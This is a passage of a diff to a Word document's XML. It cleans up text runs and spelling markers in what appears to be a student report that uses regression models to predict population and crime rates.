-          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
-          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
-            <w14:noFill/>
-            <w14:prstDash w14:val="solid"/>
-            <w14:bevel/>
-          </w14:textOutline>
-        </w:rPr>
-        <w:t xml:space="preserve"> to extract total population figures between 2003 and 202</w:t>
+        <w:t>To compare population growth and crime rates, we will filter the population dataframe to extract total population figures between 2003 and 202</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -12110,28 +11549,8 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-        <w:t xml:space="preserve"> and population </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:iCs/>
-          <w:color w:val="auto"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
-          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
-          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
-            <w14:noFill/>
-            <w14:prstDash w14:val="solid"/>
-            <w14:bevel/>
-          </w14:textOutline>
-        </w:rPr>
-        <w:t>growth</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t xml:space="preserve"> and population growth</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -12515,7 +11934,6 @@
           <w:lang w:val="en-IE"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Roboto Regular" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -12523,17 +11941,82 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="en-IE"/>
         </w:rPr>
-        <w:t>For the purpose of</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
+        <w:t>For the purpose of developing a machine learning model, I will utilize the new generated dataset, Pop_and_crime_df.csv. To prepare the data for Machine Learning, I will standardize the crime rate providing the crime rate per 100,000 people, which is a common way to standardize crime rates for comparison.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Roboto Regular" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
           <w:lang w:val="en-IE"/>
         </w:rPr>
-        <w:t xml:space="preserve"> developing a machine learning model, I will utilize the new generated dataset, Pop_and_crime_df.csv. To prepare the data for Machine Learning, I will standardize the crime rate providing the crime rate per 100,000 people, which is a common way to standardize crime rates for comparison.</w:t>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Roboto Regular" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-IE"/>
+        </w:rPr>
+        <w:t>I will use CRISP-DM project management framework,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Roboto Regular" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-IE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Roboto Regular" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-IE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">applying </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Roboto Regular" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-IE"/>
+        </w:rPr>
+        <w:t>multiple machine learning models</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Roboto Regular" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-IE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> and </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Roboto Regular" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-IE"/>
+        </w:rPr>
+        <w:t>examine the performance</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Roboto Regular" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-IE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> of each model.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12554,102 +12037,7 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="en-IE"/>
         </w:rPr>
-        <w:t>I will use CRISP-DM project management framework,</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Roboto Regular" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-IE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Roboto Regular" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-IE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">applying </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Roboto Regular" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-IE"/>
-        </w:rPr>
-        <w:t>multiple machine learning models</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Roboto Regular" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-IE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> and </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Roboto Regular" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-IE"/>
-        </w:rPr>
-        <w:t>examine the performance</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Roboto Regular" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-IE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> of each model.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Roboto Regular" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-IE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Roboto Regular" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-IE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">These tasks will be performed in the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Roboto Regular" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-IE"/>
-        </w:rPr>
-        <w:t>jupyter</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Roboto Regular" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-IE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> notebook: </w:t>
+        <w:t xml:space="preserve">These tasks will be performed in the jupyter notebook: </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -13113,25 +12501,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Considering that the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>dataframe</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> contains 20 rows, removing outliers would eliminate 5 rows. In this scenario, the preferred approach is to transform the data to mitigate skewness rather than removing outliers.</w:t>
+        <w:t>Considering that the dataframe contains 20 rows, removing outliers would eliminate 5 rows. In this scenario, the preferred approach is to transform the data to mitigate skewness rather than removing outliers.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -14541,19 +13911,8 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
-        <w:t xml:space="preserve">Square </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t>Transformation;</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>Square Transformation;</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -14577,19 +13936,8 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
-        <w:t xml:space="preserve">Cubes </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t>Transformation;</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>Cubes Transformation;</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -14608,34 +13956,15 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Square Transformation</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> The square</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> transformation is effective in reducing left skewness. It's the counterpart of the square root transformation and can be used when the data is left-skewed.</w:t>
+        <w:t>Square Transformation:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> The square transformation is effective in reducing left skewness. It's the counterpart of the square root transformation and can be used when the data is left-skewed.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -14728,23 +14057,13 @@
         </w:rPr>
         <w:t xml:space="preserve"> Exponential transformations can be applied to data with negative skewness to </w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>expands</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> small values and compresses large values</w:t>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>expands small values and compresses large values</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -14992,16 +14311,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">the </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>dimension</w:t>
+        <w:t>the dimension</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -15025,16 +14335,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>or</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> this </w:t>
+        <w:t xml:space="preserve">or this </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -15406,25 +14707,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve"> the crime rate, </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>Its</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> necessary to use Machine Learning to predict the number of crime in a given year.</w:t>
+        <w:t xml:space="preserve"> the crime rate, Its necessary to use Machine Learning to predict the number of crime in a given year.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -15548,25 +14831,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">For this </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>purpose</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> it’s the best option because the variables and the target are </w:t>
+        <w:t xml:space="preserve">For this purpose it’s the best option because the variables and the target are </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -16053,13 +15318,8 @@
       <w:pPr>
         <w:pStyle w:val="NormalWeb"/>
       </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>Similar to</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> Linear Regression, Lasso regression also had a very good result. The training set score and test set score are both 1.00, which means that the model is perfectly fitting the data.</w:t>
+      <w:r>
+        <w:t>Similar to Linear Regression, Lasso regression also had a very good result. The training set score and test set score are both 1.00, which means that the model is perfectly fitting the data.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -16166,16 +15426,11 @@
                             <w:r>
                               <w:t xml:space="preserve"> a </w:t>
                             </w:r>
-                            <w:proofErr w:type="gramStart"/>
                             <w:r>
                               <w:t xml:space="preserve">MSE </w:t>
                             </w:r>
                             <w:r>
-                              <w:t xml:space="preserve"> very</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:t xml:space="preserve"> low (</w:t>
+                              <w:t xml:space="preserve"> very low (</w:t>
                             </w:r>
                             <w:r>
                               <w:t>0.00563426</w:t>
@@ -16234,16 +15489,11 @@
                       <w:r>
                         <w:t xml:space="preserve"> a </w:t>
                       </w:r>
-                      <w:proofErr w:type="gramStart"/>
                       <w:r>
                         <w:t xml:space="preserve">MSE </w:t>
                       </w:r>
                       <w:r>
-                        <w:t xml:space="preserve"> very</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:t xml:space="preserve"> low (</w:t>
+                        <w:t xml:space="preserve"> very low (</w:t>
                       </w:r>
                       <w:r>
                         <w:t>0.00563426</w:t>
@@ -16724,15 +15974,7 @@
         <w:t xml:space="preserve"> model,</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> “</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>lr_pop</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>”</w:t>
+        <w:t xml:space="preserve"> “lr_pop”</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> that utilize simple regression, </w:t>
@@ -16764,21 +16006,8 @@
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>dataframe</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> with a range of years from 2023 to </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>2030, and</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
+      <w:r>
+        <w:t xml:space="preserve">dataframe with a range of years from 2023 to 2030, and </w:t>
       </w:r>
       <w:r>
         <w:t>applied</w:t>
@@ -16787,15 +16016,7 @@
         <w:t xml:space="preserve"> the model </w:t>
       </w:r>
       <w:r>
-        <w:t>“</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>lr_pop</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">” to predict the </w:t>
+        <w:t xml:space="preserve">“lr_pop” to predict the </w:t>
       </w:r>
       <w:r>
         <w:t>population.</w:t>
@@ -16863,16 +16084,11 @@
       <w:r>
         <w:t xml:space="preserve"> model, "</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:t>lasso</w:t>
       </w:r>
       <w:r>
-        <w:t>_crime</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>," which estimates crime rates based on population demographics.</w:t>
+        <w:t>_crime," which estimates crime rates based on population demographics.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -17003,27 +16219,7 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
-        <w:t xml:space="preserve">that crime rates would decline over the next seven years. This is a positive trend, and it suggests that the model </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t>is able to</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> identify factors that are contributing to the current crime rate and that these factors are likely to change in the future.</w:t>
+        <w:t>that crime rates would decline over the next seven years. This is a positive trend, and it suggests that the model is able to identify factors that are contributing to the current crime rate and that these factors are likely to change in the future.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -17039,12 +16235,10 @@
         <w:t xml:space="preserve">4.0 </w:t>
       </w:r>
       <w:bookmarkEnd w:id="20"/>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:t>Programing</w:t>
       </w:r>
       <w:bookmarkEnd w:id="21"/>
-      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p/>
     <w:p>
@@ -17130,25 +16324,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">programming and </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>object oriented</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> programming </w:t>
+        <w:t xml:space="preserve">programming and object oriented programming </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -17158,7 +16334,6 @@
         </w:rPr>
         <w:t xml:space="preserve">has been </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -17167,7 +16342,6 @@
         </w:rPr>
         <w:t>aplied</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -17291,25 +16465,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>programming,</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> it tells the computer how to perform the task step by step. </w:t>
+        <w:t xml:space="preserve"> programming, it tells the computer how to perform the task step by step. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -17456,41 +16612,13 @@
         </w:rPr>
         <w:t xml:space="preserve">, for example, </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>rename_</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>col</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>)</w:t>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>rename_col()</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -17977,25 +17105,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">By using different programming paradigms will increase the performance of the code, </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>as well as,</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> the </w:t>
+        <w:t xml:space="preserve">By using different programming paradigms will increase the performance of the code, as well as, the </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -18087,25 +17197,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve"> applying different </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>programing</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> paradigms and commenting the code, i</w:t>
+        <w:t xml:space="preserve"> applying different programing paradigms and commenting the code, i</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -18453,25 +17545,14 @@
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
